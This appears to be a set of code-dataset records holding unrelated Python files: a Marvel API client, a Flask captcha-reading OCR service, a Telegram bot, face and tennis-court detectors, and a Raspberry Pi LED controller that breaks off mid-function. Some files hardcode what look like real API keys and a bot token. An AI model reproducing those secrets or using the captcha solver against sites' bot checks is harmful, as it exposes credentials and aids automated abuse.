libs\r\n\r\n\r\n#defining keys and address\r\n\r\npublic_key='345207a1e6e10efb9acd4a5fceee4829'\r\nprivate_key='08291be565ab98547bc23d1fe1e9e44b789aa3d3'\r\nts=1\r\nhash= hashlib.md5((str(ts)+private_key+public_key).encode()).hexdigest()\r\naddress = 'https://gateway.marvel.com:443/v1/public/characters'\r\n\r\n#defining parameters\r\n\r\nparameters = {\r\n \"apikey\": public_key,\r\n \"ts\": ts,\r\n \"hash\": hash\r\n}\r\n\r\nresponse =requests.get(address, params=parameters)\r\nresults = response.json()\r\nprint(json.dumps(results))\r\n#first api call\r\n\r\n#fetch all the charecters by a for loop\r\n\r\nfrom string import ascii_lowercase\r\n\r\n\r\ncharecters_df =pd.DataFrame()\r\n\r\nfor ch in list(ascii_lowercase):\r\n parameters={'ts':1,'apikey':public_key, 'hash':hash,'limit':100, 'nameStartsWith':ch}\r\n response =requests.get(address, params=parameters)\r\n results = response.json()\r\n df=pd.json_normalize(results['data']['results'])\r\n df =df[['id','name','comics.available','events.available','stories.available','series.available']]\r\n charecters_df=charecters_df.append(df)","repo_name":"LohithN10/IBM-Data-Science-","sub_path":"activity2new (1).py","file_name":"activity2new (1).py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24891376252","text":"import os\nimport shutil\n\nfrom PIL import Image, ImageDraw, ImageFont\nfrom flask import Flask\nfrom flask_restful import Resource, Api, reqparse, request\nimport easyocr\nimport requests\n\napp = Flask(__name__, static_url_path='/static')\napi = Api(app)\n\nparser = reqparse.RequestParser()\nparser.add_argument('file')\nparser.add_argument('image_url')\nparser.add_argument('image_type')\n\n\ndef download_image(url, file_name):\n full_path = app.root_path + '/' + file_name\n res = requests.get(url, stream=True)\n if res.status_code == 200:\n with open(file_name, 'wb') as f:\n shutil.copyfileobj(res.raw, f)\n print('Image sucessfully Downloaded: ', full_path)\n else:\n print('Image Couldn\\'t be retrieved')\n return app.root_path, file_name\n\n\ndef detect_captcha(url):\n reader = easyocr.Reader(['en', 'en'])\n result = reader.readtext(url)\n return result[0][1]\n\n\ndef convert_gif_to_png(url, file_name):\n print('gif ', url)\n image_name = \"captcha.png\"\n gif_path = url + '/' + file_name\n convert_path = os.path.join(url, image_name)\n img = Image.open(gif_path)\n img.save(convert_path, 'png', optimize=True, quality=70)\n return convert_path\n\n\nclass FILE(Resource):\n\n def post(self):\n file_data = request.files['file']\n print(request)\n try:\n image_path = os.path.join(app.root_path, 'image_file.png')\n file_data.save(image_path)\n response_number = detect_captcha(image_path)\n return {\n \"code\": response_number\n }\n except ValueError:\n return {\n \"code\": \"error\"\n }\n\n\nclass URL(Resource):\n\n def post(self):\n json_data = request.json\n imageURL = json_data['image_url']\n imageType = json_data['image_type']\n print(json_data)\n print(imageURL)\n print(imageType)\n try:\n if imageType != 'gif':\n response_number = detect_captcha(imageURL)\n return {\n \"code\": response_number\n }\n else:\n full_path, file_name = download_image(imageURL, 'image.gif')\n print(full_path)\n convert_image_path = convert_gif_to_png(full_path, file_name)\n print('convert ', convert_image_path)\n response_number = detect_captcha(convert_image_path)\n return {\n \"code\": response_number\n }\n except ValueError:\n return {\n \"code\": \"error\"\n }\n\n\napi.add_resource(FILE, '/ocr/file')\napi.add_resource(URL, '/ocr/url')\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"minhdatplus/restful-ocr","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15883669152","text":"#https://api.telegram.org/bot853533585:AAHi7W-NeNanfTbmnsA1P5ld23Gj7zx0iLo/sendmessage?chat_id=633737114&text=salaam\nimport requests\nimport telebot\nimport time \nbot_token = '853533585:AAHi7W-NeNanfTbmnsA1P5ld23Gj7zx0iLo'\n'''\ndef telegram_bot_sendtext(bot_message):\n \n \n bot_chatID = '633737114'\n send_text = 'https://api.telegram.org/bot' + bot_token + '/sendMessage?chat_id=' + bot_chatID + '&parse_mode=Markdown&text=' + bot_message +\"&disable_notification=True\"\n\n response = requests.get(send_text)\n\n return response.json()\ntest = telegram_bot_sendtext(\"Thi mehsun\")\nprint(test)\n'''\nbot = telebot.TeleBot(token = bot_token)\n\n@bot.message_handler(commands = [\"start\"])\ndef welcomemsg(message):\n\tbot.reply_to(message,\"welcome!\")\n\n\nwhile True:\n\ttry:\n\t\tbot.polling()\n\texcept Exception:\n\t\ttime.sleep(1)\n\t\n\n\n\n\n","repo_name":"MehdiMhmvd/Exercises","sub_path":"bot_communication.py","file_name":"bot_communication.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2684863967","text":"import ssl\nimport threading\nimport os\nimport asyncio\nimport json\nimport websockets\nimport cv2\nimport base64\nimport base64\nimport numpy as np\nimport argparse\n\nfrom mtcnn import MTCNN\n\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--port\", required=True, help=\"sayi giriniz\")\nargs = vars(ap.parse_args())\ndetector = MTCNN()\n\n\nasync def time(websocket, path):\n while True:\n print(\"Sending\")\n try:\n x = await asyncio.wait_for(websocket.recv(), timeout=3)\n print(x)\n except asyncio.TimeoutError:\n os.kill(os.getpid(), 9)\n print(\"errorrrrr\")\n # x = await websocket.recv()\n try:\n x = json.loads(x)\n img_str = str(x['data'].split(',')[1])\n img = base64.b64decode(img_str)\n jpg_as_np = np.frombuffer(img, dtype=np.uint8)\n\n img = cv2.imdecode(jpg_as_np, flags=1)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n faces = detector.detect_faces(img)\n await websocket.send(json.dumps(faces))\n except Exception as e:\n print(e)\n print(\"errorrrrr\")\n os.kill(os.getpid(), 9)\n pass\n\n\ndef between_callback():\n\n ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n ssl_context.load_cert_chain(\n './cert.pem', './key.pem')\n\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n ws_server = websockets.serve(\n time, os.getenv(\"SERVER_HOST\"), args[\"port\"], ssl=ssl_context)\n\n loop.run_until_complete(ws_server)\n loop.run_forever() # this is missing\n\n\nif __name__ == \"__main__\":\n # daemon server thread:\n server = threading.Thread(target=between_callback, daemon=True)\n server.start()\n","repo_name":"enescanguven/vunga","sub_path":"websocket/websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"9668246694","text":"\"\"\"\n!! WORK IN PROGRESS !!\n\nDetect tennis courts from aerial satellite images using a trained HAAR or LBP\nclassification model.\n\nXML file with model parameters derived from the following excellent tool:\n- https://amin-ahmadi.com/cascade-trainer-gui/6\nSome cv2 code sourced from:\n- https://www.geeksforgeeks.org/detect-an-object-with-opencv-python/\n\"\"\"\n\nfrom markup import label_court\nfrom transformations import rotate_image\n\nimport cv2\nfrom matplotlib import pyplot as plt\n\n# Constants\nMIN_SIZE_DETECTED = 70 # Objects with height or width smaller than this are ignored\nMIN_NEIGHBOURS = 5 # Num neighbors each candidate rect should have to retain\nSCALE_FACTOR = 1.1 # Greater scale reduces propensity for positives. Must be > 1\nROTATE_COUNTER = -45 # degrees to rotate image counterclockwise\n\n# File paths (Input variables)\ntest_img_path = \"images/test_true_p/test3_p.jpg\"\nclassifier_path = 'classifier/cascade8.xml'\n\n# Open image as BRG; convert to RGB and grayscale\nimg = cv2.imread(test_img_path)\nimg_rotate = rotate_image(img, ROTATE_COUNTER)\nimg_gray = cv2.cvtColor(img_rotate, cv2.COLOR_BGR2GRAY)\nimg_rgb = cv2.cvtColor(img_rotate, cv2.COLOR_BGR2RGB)\n\n# Return list of detected tennis courts in the input image\n# Use minSize to ensure capture of (hopefully) only tennis courts and not small dots\ntennis_data = cv2.CascadeClassifier(classifier_path)\n\n\nfound = tennis_data.detectMultiScale(\n img_gray, minSize=(MIN_SIZE_DETECTED,\n MIN_SIZE_DETECTED), minNeighbors=MIN_NEIGHBOURS,\n scaleFactor=SCALE_FACTOR)\n\n# If 1+ tennis court is found, draw a rectangle around it and label it. Else do nothing\namount_found = len(found)\nprint(found)\n\nif amount_found != 0:\n for (x, y, width, height) in found:\n label_court(img_rgb, x, y, width, height)\n\n# Create the environment of the picture and render it\nplt.subplot(1, 1, 1)\nplt.gcf().canvas.set_window_title(test_img_path)\nplt.imshow(img_rgb)\nplt.show()\n","repo_name":"jerdavies/Tennis-Court-Detection","sub_path":"haar/detecttenniscourt.py","file_name":"detecttenniscourt.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38700566577","text":"\nfrom django.template import Template, Context\nfrom django.shortcuts import render_to_response\n\ndef index(request):\n\tpage = { \n\t\t'title' : 'index',\n\t\t'content' : 'bla bla',\n\t}\n\n\tnumber_list = [1, 2, 3, 4, 5, 6, 7, 8]\n\n\tc = Context({'page': page, 'number_list': number_list})\n\n\treturn render_to_response('index.html', c)\n\n","repo_name":"mortenoh/webfun","sub_path":"django/djangotemplate/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16279500040","text":"# Import libraries\nimport time # Time management functions\nimport tkinter as tk # Tkinter GUI\nimport sys # Library to check platform/OS\nimport os # Used to change current directory\nimport random # Random number generator library\nfrom subprocess import call\n\n# System variable, when InSitu == False the app does not access any GPIO, SPI, ...\nif(sys.platform == 'linux'):\n InSitu = True # Running on the Yukari Raspberry Pi\nelse:\n InSitu = False # Running on the Mac for development.\n\n# Change current directory so that all file resources can be opened simply\nif InSitu:\n os.chdir('/home/pi/Documents/LEDController')\n\n# Initialize the random number generator\nrandom.seed()\n\n# GUI Definitions\nMainFont = 'Roboto Light'\nif(InSitu):\n LargeFontSize = '18'\n SmallFontSize = '14'\nelse:\n LargeFontSize = '24'\n SmallFontSize = '18'\nMainBackColor = '#505050'\nMainFrontColor = 'white'\nMainToolbarColor = '#808080'\nEditBackColor = 'light grey'\nEditFrontColor = 'dark slate grey'\nButtonBackColor = 'grey'\nButtonFrontColor = 'orange'\nListFrameListboxHeight = 12\nButtonPadY = 10\nButtonPadX = 10\nLabelPadX = 15\nLabelPadY = 10\nFieldPadX = 15\nFieldPadY = 5\nFieldBorderWidth = 2\n\n# Hardware support\nif InSitu:\n # Initialize the INA219 DC Current Sensor on the i2C interface\n # Use SDA and SCL pins to communicate with the INA219 module\n # Uses the pi-ina219 library\n from ina219 import INA219\n from ina219 import DeviceRangeError\n SHUNT_OHMS = 0.1\n ina = INA219(SHUNT_OHMS) # shunt_ohms: The value of the shunt resistor in Ohms\n # address: The I2C address of the INA219 (optional), defaults to 0x40\n try:\n ina.configure()\n except:\n ina219Present = False\n else:\n ina219Present = True\n\n # Initialize the SPI interface\n # Use MOSI and SCLK pins to communicate with the LED modules\n import spidev # SPI bus development library\n spi = spidev.SpiDev()\n spi.open(0, 0)\n spi.mode = 0\n spi.bits_per_word = 8 # 8 bits per word, looks like it's the only value working\n spi.max_speed_hz = 8000000 # 8 MHz\n\n\n# tkinter windows hierarchy\n# win\n# |- MainFrame\n# |- ListFrame\n# |- TestFrame\n# Create the main window and maximize it\nwin = tk.Tk()\nwin.title(\"YukariLED\") # This title will not appear\nif InSitu:\n win.attributes('-fullscreen', True)\n win.config(cursor='none')\n\n# Create three frames, MainFrame, ListFrame and TestFrame, all covering the entire screen / window,\n# that will be raised when required to display their own widgets\n# The mainframe is the main control screen\nMainFrame = tk.Frame(win, bg=MainBackColor, height=480, width=800)\nMainFrame.grid(row=0, column=0, sticky=tk.N+tk.E+tk.S+tk.W)\nMainFrame.grid_propagate(False)\n\n# The ListFrame is called after the Edit button is pressed and displays a list of all the lights\nListFrame = tk.Frame(win, bg=MainBackColor, height=480, width=800)\nListFrame.grid(row=0, column=0, sticky=tk.N+tk.E+tk.S+tk.W)\nListFrame.grid_propagate(False)\n\n# The TestFrame is called when a light is being tested\n# TestFrameCurrentValue is used to store the current value of the LED brightness\n# TestFrameCurrentLight is used to store the light being tested\nTestFrame = tk.Frame(win, bg=MainBackColor, height=480, width=800)\nTestFrame.grid(row=0, column=0, sticky=tk.N+tk.E+tk.S+tk.W)\nTestFrame.grid_propagate(False)\nTestFrameActive = False # Used to stop the automatic update of the lights when we are in test mode\n\n# Global variables for automatic Day/Night mode and Sky light on/off\nauto_day_night = False\nsky_on = True\n\n# Initialize the LEDCommand message to be sent through the SPI interface\n# LEDCommandSingle and LEDAllOffSingle are single messages for a single LED PWM module\n# LEDCommand and LEDAllOff are complete messages for \"number_of_LED_modules\" modules\n# !!!!! The first message goes to the LAST LED module on the chain (= farthest from the Raspberry Pi)\n# !!!!! The last message goes to the FIRST LED module on the chain (= module #0 = closest to the Raspberry Pi)\n# BLANK = 0 LEDs not blanked\n# DSPRPT = 1 PWM cycles auto repeat\n# TMGRST = 0 GS counters are not reset when a new command is received\n# EXTGCK = 0 Internal clock\n# OUTTMG = 1\n#\n# OE TD\n# UX MSB\n# TT GPL\n# TG RRA\n# MC SPN\n# 25h GK TTKBCB BCG BCR OUTB3 OUTG3 OUTR3/OUTB2 OUTG2 OUTR2/OUTB1 OUTG1 OUTR1/OUTB0 OUTG0 OUTR0\nLEDCommandSingle = [0b10010110, 0b01011111, 0b11111111, 0b11111111, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\nLEDAllOffSingle = [0b10010110, 0b01111111, 0b11111111, 0b11111111, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n# Duplicate LEDCommandSingle and LEDAllOffSingle \"number_of_LED_modules\" times into LEDCommand and LEDAllOff\nNumberOfLEDModules = 15\nLEDCommand = []\nLEDAllOff = []\nfor _ in range(NumberOfLEDModules):\n LEDCommand.extend(LEDCommandSingle)\n LEDAllOff.extend(LEDAllOffSingle)\n\n\n###############################################\n# Function to set an LED brightness in the LEDCommand message\n# This function DOES NOT SEND the LEDCommand message to the SPI bus\n# Modules are numbered 0 to number_of_LED_modules\n# Module #0 is the closest to the Raspberry Pi\n# A module has 12 ports numbered 0 to 11\n# LED brightness values in the command are 16-bit integers (0-65535)\n# The \"value\" parameter is in the range 0 (off) to 1000 (brightest)\n# The \"value\" parameter is gamma corrected before being stored in LEDCommand\ndef SetLEDBrightness(led, value):\n global LEDCommand\n\n if value >= 0 and value <= 1000:\n # Gamma correction\n value = int(65535.00*(float(value)/1000.00)**(1.8))\n\n if led['module'] < NumberOfLEDModules and led['port'] < 12:\n # Compute the particular LED/port control word position in LEDCommand\n # The length of the message is 28 bytes per LED module\n # Each LED/port occupies 16 bits (two bytes)\n pos = 26 - led['port']*2 + (NumberOfLEDModules-1-led['module'])*28\n # Write the LED value into LEDCommand\n LEDCommand[pos] = value >> 8 # MSB\n LEDCommand[pos+1] = value & 255 # LSB\n\n\n# Initialize light_list from the file 'light_list.py'\nfrom light_list import *\n\n# Save light_list modules and ports to a text file for debugging / reference\nprevious_module = -1\nwith open('light_list_table.txt', 'w') as fp:\n for led in sorted(light_list, key=lambda k: k['module']*100+k['port']):\n if led['module'] != previous_module:\n previous_module = led['module']\n print(\"\\n--- Module {:2d} --------------------------\".format(led['module']), file=fp)\n print(\"Port {:2d}: {}\".format(led['port'], led['name']), file=fp)\n\n# Global Day/Night time variables\nlast_day_night_switch_time = -1000.0\nday_night_auto_period = 180\ngoing_to_night = False\ngoing_to_day = True\n# led_skyR['time_to_day'][-1]\nday_night_transition_length = 60 # ????????????????????????????????????????????? Improve\n\n\n# Compute the values and (random) times of the sequences for all 'Random Day/Night' LEDs\ndef RandomizeDayNightTime():\n for led in light_list:\n if led['mode'] == 'Random Day/Night':\n time = round(random.uniform(10.0, 30.0), 1)\n led['time_to_night'] = [0, time, time+0.2, 60]\n led['value_to_night'] = [led['value_day'], led['value_day'], led['value_night'], led['value_night']]\n time = round(random.uniform(10.0, 30.0), 1)\n led['time_to_day'] = [0, time, time+0.2, 60]\n led['value_to_day'] = [led['value_night'], led['value_night'], led['value_day'], led['value_day']]\n\n\n# Initialize all the constant LEDs values\ndef InitConstantLEDs():\n for led in light_list:\n if led['mode'] == 'Constant':\n SetLEDBrightness(led, led['value'])\n\n\n# Function to compute the brightness of an LED (led) based on the current time (c_time)\n# Brightness values are interpolated from the sequence event tables\ndef UpdateLED(c_time, led):\n # Processing of Sky On/Off switch\n # If the current led has its 'switch' key defined and equal to 'Sky' and the Sky switch is off\n # then just set the led brightness to zero\n if (not sky_on) and 'switch' in led and (led['switch'] == 'Sky'):\n SetLEDBrightness(led, 0)\n return\n # LED Mode Cycle\n if led['mode'] == 'Cycle':\n c_time = c_time % led['time'][-1]\n for ev in range(0, len(led['time'])-1):\n if c_time <= led['time'][ev+1]:\n SetLEDBrightness(led, int(led['value'][ev]+(c_time-led['time'][ev])*(\n led['value'][ev+1]-led['value'][ev])/(led['time'][ev+1]-led['time'][ev])))\n return\n return\n # LED Mode Day/Night and Random Day/Night\n if led['mode'] in ('Day/Night', 'Random Day/Night'):\n c_time = c_time - last_day_night_switch_time\n if going_to_night:\n if c_time >= led['time_to_night'][-1]:\n SetLEDBrightness(led, int(led['value_to_night'][-1]))\n return\n for ev in range(0, len(led['time_to_night'])-1):\n if c_time <= led['time_to_night'][ev+1]:\n SetLEDBrightness(led, int(led['value_to_night'][ev]+(c_time-led['time_to_night'][ev])*(\n led['value_to_night'][ev+1]-led['value_to_night'][ev])/(led['time_to_night'][ev+1]-led['time_to_night'][ev])))\n return\n if going_to_day:\n if c_time >= led['time_to_day'][-1]:\n SetLEDBrightness(led, int(led['value_to_day'][-1]))\n return\n for ev in range(0, len(led['time_to_day'])-1):\n if c_time <= led['time_to_day'][ev+1]:\n SetLEDBrightness(led, int(led['value_to_day'][ev]+(c_time-led['time_to_day'][ev])*(\n led['value_to_day'][ev+1]-led['value_to_day'][ev])/(led['time_to_day'][ev+1]-led['time_to_day'][ev])))\n return\n return\n\n\n# Function to trigger change to night time\n# Known bug: this function does not properly manage the dayNightUpdate callback when called directly from the button event\ndef go_to_night(event=0):\n global last_day_night_switch_time\n global going_to_night\n global going_to_day\n now = time.perf_counter()\n if not going_to_night:\n # We were not going to night, first touch of the button, initiate transition\n if going_to_day and (now - last_day_night_switch_time) < day_night_transition_length:\n # We were transitioning to day\n last_day_night_switch_time = 2 * now - last_day_night_switch_time - day_night_transition_length\n else:\n # We were during the day\n RandomizeDayNightTime()\n last_day_night_switch_time = now\n else:\n # We were already going to night, second touch of the button,\n # force immediate transition (actually day_night_transition_length ago)\n last_day_night_switch_time = now - float(day_night_transition_length)\n going_to_night = True\n going_to_day = False\n\n\n# Function to trigger change to day time\n# Known bug: this function does not properly manage the dayNightUpdate callback when called directly from the button event\ndef go_to_day(event=0):\n global last_day_night_switch_time\n global going_to_night\n global going_to_day\n now = time.perf_counter()\n if not going_to_day:\n # We were not going to day, first touch of the button, initiate transition\n if going_to_night and (now - last_day_night_switch_time) < day_night_transition_length:\n # We were transitioning to night\n last_day_night_switch_time = 2 * now - last_day_night_switch_time - day_night_transition_length\n else:\n # We were during the night\n RandomizeDayNightTime()\n last_day_night_switch_time = now\n else:\n # We were already going to day, second touch of the button,\n # force immediate transition (actually day_night_transition_length ago)\n last_day_night_switch_time = now - float(day_night_transition_length)\n going_to_night = False\n going_to_day = True\n\n\n# Button service functions\ndef MainFrameExitButtonPressed(event=0):\n if InSitu:\n # Switch off all LEDs and close the SPI interface\n spi.writebytes(LEDAllOff)\n time.sleep(0.1)\n spi.close()\n # Exit\n win.destroy()\n\n\ndef MainFrameShutdownButtonPressed(event=0):\n if InSitu:\n # Switch off all LEDs and close the SPI interface\n spi.writebytes(LEDAllOff)\n time.sleep(0.1)\n spi.close()\n # Exit and shutdown\n call(\"sudo shutdown -h now\", shell=True)\n win.destroy()\n\n\ndef MainFrameEditButtonPressed(event=0):\n ListFrame.tkraise()\n if InSitu:\n win.config(cursor='arrow')\n\n\ndef ListFrameBackButtonPressed(event=0):\n MainFrame.tkraise()\n if InSitu:\n win.config(cursor='none')\n\n\ndef ListFrameTestButtonPressed(event=0):\n global TestFrameCurrentLight\n global TestFrameCurrentValue\n global TestFrameActive\n\n # Get the name of the light from the Listbox\n Name = ListFrameListbox.get(tk.ACTIVE)\n # TestFrameCurrentLight will point to the Light (which is a dictionary) currently being tested\n TestFrameCurrentLight = next(item for item in light_list if item['name'] == Name)\n\n # Copy the values of TestFrameCurrentLight into the corresponding TestFrame widgets\n TestFrameNameField.configure(text=TestFrameCurrentLight['name'])\n TestFrameModuleField.configure(text=TestFrameCurrentLight['module'])\n TestFramePortField.configure(text=TestFrameCurrentLight['port'])\n\n if TestFrameCurrentLight['mode'] == 'Constant':\n TestFrameCurrentValue = TestFrameCurrentLight['value']\n else:\n TestFrameCurrentValue = 500\n TestFrameValueField.configure(text=TestFrameCurrentValue)\n\n # Record the fact that we are in the TestFrame\n # Used to stop the automatic update of the lights when we are in test mode\n TestFrameActive = True\n TestFrame.tkraise()\n\n\ndef TestFrameBackButtonPressed(event=0):\n global TestFrameActive\n TestFrameActive = False\n ListFrame.tkraise()\n\n\ndef MainFrameAutoButtonPressed(event=0):\n global auto_day_night\n if not auto_day_night:\n MainFrameAutoButton[\"image\"] = onButtonImage\n auto_day_night = True\n else:\n MainFrameAutoButton[\"image\"] = offButtonImage\n auto_day_night = False\n dayNightUpdate()\n\n\ndef MainFrameSkyButtonPressed(event=0):\n global sky_on\n if not sky_on:\n MainFrameSkyButton[\"image\"] = onButtonImage\n sky_on = True\n else:\n MainFrameSkyButton[\"image\"] = offButtonImage\n sky_on = False\n\n\n# Load tkinter images\nexitButtonImage = tk.PhotoImage(file=\"icons8-close_window.gif\")\nshutdownButtonImage = tk.PhotoImage(file=\"icons8-shutdown.gif\")\neditButtonImage = tk.PhotoImage(file=\"icons8-edit-row.gif\")\nnightButtonImage = tk.PhotoImage(file=\"icons8-moon_symbol.gif\")\nnightOnButtonImage = tk.PhotoImage(file=\"icons8-moon_symbol_shine.gif\")\ndayButtonImage = tk.PhotoImage(file=\"icons8-sun.gif\")\ndayOnButtonImage = tk.PhotoImage(file=\"icons8-sun_shine.gif\")\nonButtonImage = tk.PhotoImage(file=\"icons8-toggle_on.gif\")\noffButtonImage = tk.PhotoImage(file=\"icons8-toggle_off.gif\")\n\n# Create tkinter mainframe widgets\n# Create mainframe toolbar frame and toolbar widgets\nMainFrameToolbar = tk.Frame(MainFrame, bg=MainToolbarColor)\nMainFrameToolbar.grid(column=0, columnspan=4, row=0, sticky=tk.W + tk.E)\n\nMainFrameShutdownButton = tk.Label(MainFrameToolbar, image=shutdownButtonImage, bg=MainToolbarColor)\nMainFrameShutdownButton.grid(column=0, row=0, padx=ButtonPadX, pady=ButtonPadY)\n\nMainFrameExitButton = tk.Label(MainFrameToolbar, image=exitButtonImage, bg=MainToolbarColor)\nMainFrameExitButton.grid(column=1, row=0, padx=ButtonPadX, pady=ButtonPadY)\n\nMainFrameEditButton = tk.Label(MainFrameToolbar, image=editButtonImage, bg=MainToolbarColor)\nMainFrameEditButton.grid(column=2, row=0, padx=ButtonPadX, pady=ButtonPadY)\n\nMainFrameTimeText = tk.StringVar()\nMainFrameTimeLabel = tk.Label(MainFrameToolbar, textvariable=MainFrameTimeText, font=(MainFont, LargeFontSize),\n fg=MainFrontColor, bg=MainToolbarColor)\nMainFrameTimeLabel.grid(column=3, row=0, padx=LabelPadX, pady=LabelPadY, sticky=tk.E)\n\nfor column in range(3):\n MainFrameToolbar.grid_columnconfigure(column, weight=1)\nMainFrameToolbar.grid_columnconfigure(3, weight=10)\n\n# Create the other mainframe widgets\nMainFrameAutoButton = tk.Label(MainFrame, text=\"Auto\", font=(MainFont, LargeFontSize), image=offButtonImage,\n compound=tk.BOTTOM, fg=MainFrontColor, bg=MainBackColor)\nMainFrameAutoButton.grid(column=2, row=3)\n\nMainFrameNightButton = tk.Label(MainFrame, image=nightButtonImage, bg=MainBackColor)\nMainFrameNightButton.grid(column=0, row=3)\n\nMainFrameDayButton = tk.Label(MainFrame, image=dayButtonImage, bg=MainBackColor)\nMainFrameDayButton.grid(column=3, row=3)\n\nMainFrameSkyButton = tk.Label(MainFrame, text=\"Sky\", font=(MainFont, LargeFontSize), image=onButtonImage,\n compound=tk.BOTTOM, fg=MainFrontColor, bg=MainBackColor)\nMainFrameSkyButton.grid(column=1, row=3)\n\nMainFrameProgressText = tk.StringVar()\nMainFrameProgressLabel = tk.Label(MainFrame, textvariable=MainFrameProgressText, font=(MainFont, LargeFontSize),\n fg=MainFrontColor, bg=MainBackColor)\nMainFrameProgressCanvasWidth = 796\nMainFrameProgressCursorWidth = 32\nMainFrameProgressCursorLimit = MainFrameProgressCanvasWidth - MainFrameProgressCursorWidth + 2\nMainFrameProgressCanvas = tk.Canvas(MainFrame, bg=MainBackColor, height=30, width=MainFrameProgressCanvasWidth,\n highlightthickness=FieldBorderWidth)\nMainFrameProgressRect = MainFrameProgressCanvas.create_rectangle(0, 0, MainFrameProgressCursorWidth,\n MainFrameProgressCursorWidth, fill=MainFrontColor,\n outline=MainBackColor)\nMainFrameProgressLabel.grid(column=0, columnspan=4, row=1, pady=ButtonPadY)\nMainFrameProgressCanvas.grid(column=0, columnspan=4, row=2, pady=ButtonPadY)\n\nMainFrameSeparator1Canvas = tk.Canvas(MainFrame, bg=MainBackColor, height=0, width=MainFrameProgressCanvasWidth,\n highlightthickness=FieldBorderWidth)\nMainFrameSeparator1Canvas.grid(column=0, columnspan=4, row=4)\n\nMainFrameLightButton = []\n# Find the name of the four buttons corresponding to Switch 0, Switch 1, Switch 2 and Switch 3 in light_list\n# If any of them is not found, the corresponding button is given the name 'N/C'\nfor pos in range(4):\n try:\n work_light = next(light for light in light_list if 'switch' in light and light['switch'] == 'Switch ' + str(pos))\n button_name = work_light['name']\n except:\n button_name = 'N/C'\n MainFrameLightButton.append(tk.Label(MainFrame, text=button_name, font=(MainFont, LargeFontSize), image=offButtonImage,\n compound=tk.BOTTOM, fg=MainFrontColor, bg=MainBackColor))\n MainFrameLightButton[-1].grid(column=pos, row=5)\n\nMainFrameSeparator2Canvas = tk.Canvas(MainFrame, bg=MainBackColor, height=0, width=MainFrameProgressCanvasWidth, highlightthickness=FieldBorderWidth)\nMainFrameSeparator2Canvas.grid(column=0, columnspan=4, row=6)\n\nMainFrameVoltageText = tk.StringVar()\nMainFrameVoltageLabel = tk.Label(MainFrame, textvariable=MainFrameVoltageText, font=(MainFont, LargeFontSize),\n fg=MainFrontColor, bg=MainBackColor)\nMainFrameVoltageLabel.grid(column=0, row=7, sticky=tk.E)\n\nMainFrameCurrentText = tk.StringVar()\nMainFrameCurrentLabel = tk.Label(MainFrame, textvariable=MainFrameCurrentText, font=(MainFont, LargeFontSize),\n fg=MainFrontColor, bg=MainBackColor)\nMainFrameCurrentLabel.grid(column=1, row=7, sticky=tk.E)\n\nMainFramePowerText = tk.StringVar()\nMainFramePowerLabel = tk.Label(MainFrame, textvariable=MainFramePowerText, font=(MainFont, LargeFontSize),\n fg=MainFrontColor, bg=MainBackColor)\nMainFramePowerLabel.grid(column=2, row=7, sticky=tk.E)\n\nfor column in range(4):\n MainFrame.grid_columnconfigure(column, minsize=200)\n\n# Create tkinter ListFrame widgets\nListFrameBackButton = tk.Label(ListFrame, text='< Back', font=(MainFont, LargeFontSize), fg=ButtonFrontColor,\n bg=ButtonBackColor)\nListFrameBackButton.grid(column=0, row=0, padx=ButtonPadX, pady=ButtonPadY, ipadx=10, sticky=tk.W)\n\nListFrameTestButton = tk.Label(ListFrame, text='Test', font=(MainFont, LargeFontSize), fg=ButtonFrontColor,\n bg=ButtonBackColor)\nListFrameTestButton.grid(column=2, row=0, padx=ButtonPadX, pady=ButtonPadY, ipadx=10, sticky=tk.W)\n\nListFrameYScroll = tk.Scrollbar(ListFrame, orient=tk.VERTICAL, relief=tk.FLAT, troughcolor=ButtonBackColor, width=40)\nListFrameListbox = tk.Listbox(ListFrame, font=(MainFont, LargeFontSize), height=ListFrameListboxHeight,\n yscrollcommand=ListFrameYScroll.set, activestyle='none',\n bg=MainBackColor, fg=MainFrontColor, selectmode=tk.SINGLE,\n selectbackground='light grey', selectforeground='black')\nListFrameYScroll['command'] = ListFrameListbox.yview\nListFrameListbox.grid(column=0, columnspan=3, row=2,\n rowspan=ListFrameListboxHeight, padx=10, sticky=tk.W + tk.E)\nListFrameYScroll.grid(column=3, row=2, rowspan=ListFrameListboxHeight, sticky=tk.W + tk.N + tk.S)\n\nListFrameListboxContent = [d['name'] for d in light_list]\nListFrameListboxContent.sort()\nListFrameListbox.insert(1, *ListFrameListboxContent)\nListFrameListbox.selection_set(0)\n\nfor column in range(3):\n ListFrame.grid_columnconfigure(column, weight=6)\nListFrame.grid_columnconfigure(3, weight=1)\n\n\n# Create tkinter TestFrame widgets\ndef TestFrameValuePadHandler(event):\n global TestFrameCurrentValue\n global TestFrameCurrentLight\n\n # event.x is the x position of the mouse in the canvas\n # TestFrame.grid_bbox()[2] is the width of the bounding box of the columns of the frame\n # In addition, two 20-pixel areas are reserved at the left and right of the canvas\n # for values 0 and 1000\n CanvasWidth = TestFrame.grid_bbox()[2] - FieldPadX * 2\n TestFrameCurrentValue = int((event.x - 20) * 1000 / (CanvasWidth - 40))\n\n if 